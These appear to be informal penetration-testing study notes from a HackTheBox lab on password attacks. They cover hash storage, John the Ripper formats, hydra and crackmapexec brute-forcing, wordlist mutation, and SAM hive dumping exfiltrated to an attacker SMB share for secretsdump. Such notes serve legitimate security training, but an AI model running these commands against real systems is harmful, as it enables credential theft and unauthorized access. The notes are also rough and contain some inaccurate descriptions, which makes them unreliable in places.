hashed pw is stored in shadow
$1$ MD5
$2a$ Blowfish
$5$ SHA-256
$6$ SHA-512
$sha1$ SHA1crypt
$y$ Yescrypt
$gy$ Gost-yescrypt
$7$ Scrypt
Local Security Authority Subsystem Service (LSASS) is a collection of many modules and has access to all authentication processes that can be found in %SystemRoot%\System32\Lsass.exe. This service is responsible for the local system security policy, user authentication, and sending security audit logs to the Event log. In other words, it is the vault for Windows-based operating systems, and we can find a more detailed illustration of the LSASS architecture here.
Authentication Packages Description
Lsasrv.dll The LSA Server service both enforces security policies and acts as the security package manager for the LSA. The LSA contains the Negotiate function, which selects either the NTLM or Kerberos protocol after determining which protocol is to be successful.
Msv1_0.dll Authentication package for local machine logons that don't require custom authentication.
Samsrv.dll The Security Accounts Manager (SAM) stores local security accounts, enforces locally stored policies, and supports APIs.
Kerberos.dll Security package loaded by the LSA for Kerberos-based authentication on a machine.
Netlogon.dll Network-based logon service.
Ntdsa.dll This library is used to create new records and folders in the Windows registry.
windows pw is stored:
%SystemRoot%/system32/config/SAM
%SystemRoot%\ntds.dit
NTDS is often found on joint windows networkds
User accounts (username & password hash)
Group accounts
Computer accounts
Group policy objects
PS C:\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\crack the pw: john --format=<hash_type> <hash or hash_file>
afs john --format=afs hashes_to_crack.txt AFS (Andrew File System) password hashes
bfegg john --format=bfegg hashes_to_crack.txt bfegg hashes used in Eggdrop IRC bots
bf john --format=bf hashes_to_crack.txt Blowfish-based crypt(3) hashes
bsdi john --format=bsdi hashes_to_crack.txt BSDi crypt(3) hashes
crypt(3) john --format=crypt hashes_to_crack.txt Traditional Unix crypt(3) hashes
des john --format=des hashes_to_crack.txt Traditional DES-based crypt(3) hashes
dmd5 john --format=dmd5 hashes_to_crack.txt DMD5 (Dragonfly BSD MD5) password hashes
dominosec john --format=dominosec hashes_to_crack.txt IBM Lotus Domino 6/7 password hashes
EPiServer SID hashes john --format=episerver hashes_to_crack.txt EPiServer SID (Security Identifier) password hashes
hdaa john --format=hdaa hashes_to_crack.txt hdaa password hashes used in Openwall GNU/Linux
hmac-md5 john --format=hmac-md5 hashes_to_crack.txt hmac-md5 password hashes
hmailserver john --format=hmailserver hashes_to_crack.txt hmailserver password hashes
ipb2 john --format=ipb2 hashes_to_crack.txt Invision Power Board 2 password hashes
krb4 john --format=krb4 hashes_to_crack.txt Kerberos 4 password hashes
krb5 john --format=krb5 hashes_to_crack.txt Kerberos 5 password hashes
LM john --format=LM hashes_to_crack.txt LM (Lan Manager) password hashes
lotus5 john --format=lotus5 hashes_to_crack.txt Lotus Notes/Domino 5 password hashes
mscash john --format=mscash hashes_to_crack.txt MS Cache password hashes
mscash2 john --format=mscash2 hashes_to_crack.txt MS Cache v2 password hashes
mschapv2 john --format=mschapv2 hashes_to_crack.txt MS CHAP v2 password hashes
mskrb5 john --format=mskrb5 hashes_to_crack.txt MS Kerberos 5 password hashes
mssql05 john --format=mssql05 hashes_to_crack.txt MS SQL 2005 password hashes
mssql john --format=mssql hashes_to_crack.txt MS SQL password hashes
mysql-fast john --format=mysql-fast hashes_to_crack.txt MySQL fast password hashes
mysql john --format=mysql hashes_to_crack.txt MySQL password hashes
mysql-sha1 john --format=mysql-sha1 hashes_to_crack.txt MySQL SHA1 password hashes
NETLM john --format=netlm hashes_to_crack.txt NETLM (NT LAN Manager) password hashes
NETLMv2 john --format=netlmv2 hashes_to_crack.txt NETLMv2 (NT LAN Manager version 2) password hashes
NETNTLM john --format=netntlm hashes_to_crack.txt NETNTLM (NT LAN Manager) password hashes
NETNTLMv2 john --format=netntlmv2 hashes_to_crack.txt NETNTLMv2 (NT LAN Manager version 2) password hashes
NEThalfLM john --format=nethalflm hashes_to_crack.txt NEThalfLM (NT LAN Manager) password hashes
md5ns john --format=md5ns hashes_to_crack.txt md5ns (MD5 namespace) password hashes
nsldap john --format=nsldap hashes_to_crack.txt nsldap (OpenLDAP SHA) password hashes
ssha john --format=ssha hashes_to_crack.txt ssha (Salted SHA) password hashes
NT john --format=nt hashes_to_crack.txt NT (Windows NT) password hashes
openssha john --format=openssha hashes_to_crack.txt OPENSSH private key password hashes
oracle11 john --format=oracle11 hashes_to_crack.txt Oracle 11 password hashes
oracle john --format=oracle hashes_to_crack.txt Oracle password hashes
pdf john --format=pdf hashes_to_crack.txt PDF (Portable Document Format) password hashes
phpass-md5 john --format=phpass-md5 hashes_to_crack.txt PHPass-MD5 (Portable PHP password hashing framework) password hashes
phps john --format=phps hashes_to_crack.txt PHPS password hashes
pix-md5 john --format=pix-md5 hashes_to_crack.txt Cisco PIX MD5 password hashes
po john --format=po hashes_to_crack.txt Po (Sybase SQL Anywhere) password hashes
rar john --format=rar hashes_to_crack.txt RAR (WinRAR) password hashes
raw-md4 john --format=raw-md4 hashes_to_crack.txt Raw MD4 password hashes
raw-md5 john --format=raw-md5 hashes_to_crack.txt Raw MD5 password hashes
raw-md5-unicode john --format=raw-md5-unicode hashes_to_crack.txt Raw MD5 Unicode password hashes
raw-sha1 john --format=raw-sha1 hashes_to_crack.txt Raw SHA1 password hashes
raw-sha224 john --format=raw-sha224 hashes_to_crack.txt Raw SHA224 password hashes
raw-sha256 john --format=raw-sha256 hashes_to_crack.txt Raw SHA256 password hashes
raw-sha384 john --format=raw-sha384 hashes_to_crack.txt Raw SHA384 password hashes
raw-sha512 john --format=raw-sha512 hashes_to_crack.txt Raw SHA512 password hashes
salted-sha john --format=salted-sha hashes_to_crack.txt Salted SHA password hashes
sapb john --format=sapb hashes_to_crack.txt SAP CODVN B (BCODE) password hashes
sapg john --format=sapg hashes_to_crack.txt SAP CODVN G (PASSCODE) password hashes
sha1-gen john --format=sha1-gen hashes_to_crack.txt Generic SHA1 password hashes
skey john --format=skey hashes_to_crack.txt S/Key (One-time password) hashes
ssh john --format=ssh hashes_to_crack.txt SSH (Secure Shell) password hashes
sybasease john --format=sybasease hashes_to_crack.txt Sybase ASE password hashes
xsha john --format=xsha hashes_to_crack.txt xsha (Extended SHA) password hashes
zip john --format=zip hashes_to_crack.txt ZIP (WinZip) password hashes
pure brute force
Cracking w. john
cry0l1t3@htb:~$ <tool> <file_to_crack> > file.hash
cry0l1t3@htb:~$ pdf2john server_doc.pdf > server_doc.hash
cry0l1t3@htb:~$ john server_doc.hash
# OR
cry0l1t3@htb:~$ john --wordlist=<wordlist.txt> server_doc.hash pdf2john Converts PDF documents for John
ssh2john Converts SSH private keys for John
mscash2john Converts MS Cash hashes for John
keychain2john Converts OS X keychain files for John
rar2john Converts RAR archives for John
pfx2john Converts PKCS#12 files for John
truecrypt_volume2john Converts TrueCrypt volumes for John
keepass2john Converts KeePass databases for John
vncpcap2john Converts VNC PCAP files for John
putty2john Converts PuTTY private keys for John
zip2john Converts ZIP archives for John
hccap2john Converts WPA/WPA2 handshake captures for John
office2john Converts MS Office documents for John
wpa2john Converts WPA/WPA2 handshakes for John
or
locate *2john*
FTP SMB NFS
IMAP/POP3 SSH MySQL/MSSQL
RDP WinRM VNC
Telnet SMTP LDAP
sudo apt-get -y install crackmapexec
Crackmap usage:
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
sudo gem install evil-winrm
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i 10.129.42.197 -u user -p password
hydra -L user.list -P password.list ssh://10.129.42.197
ssh user@10.129.42.197
hydra -L user.list -P password.list rdp://10.129.42.197
Thereafter:
xfreerdp /v:<target-IP> /u:<username> /p:<password>
hydra -L user.list -P password.list smb://10.129.42.197
use auxiliary/scanner/smb/smb_login
crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares
smbclient -U user \\\\10.129.42.197\\SHARENAME
We can add a custom rule to a password list to make hashcat test a multityde of mutations for each of the passwords
Function Description
: Do nothing.
l Lowercase all letters.
u Uppercase all letters.
c Capitalize the first letter and lowercase others.
sXY Replace all instances of X with Y.
$! Add the exclamation character at the end.
zirap98@htb[/htb]$ cat custom.rule
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
ls /usr/share/hashcat/rules/
We can use CeWL to crawl websites for company passwords. We can now use another tool called CeWL to scan potential words from the company's website and save them in a separate list. We can then combine this list with the desired rules and create a customized password list that has a higher probability of guessing a correct password. We specify some parameters, like the depth to spider (-d), the minimum length of the word (-m), the storage of the found words in lowercase (--lowercase), as well as the file where we want to store the results (-w).
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
Check if you can use any other service to brute force. Add more threads to hydra.
to crack zip pws: sudo fcrack -u -D -p ./mut_password.list Notes.zip
SAM is a file that stores users, groups etc on Windows machines. It's used by services like Kerberos authentication or NTLM authentiation.
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
Too attack we can use impacket
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
Then move the data:
move sam.save \\10.10.15.16\CompData
move security.save \\10.10.15.16\CompData
move system.save \\10.10.15.16\CompDataDumping hashes with impackets
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Though we cannot dump it without boot key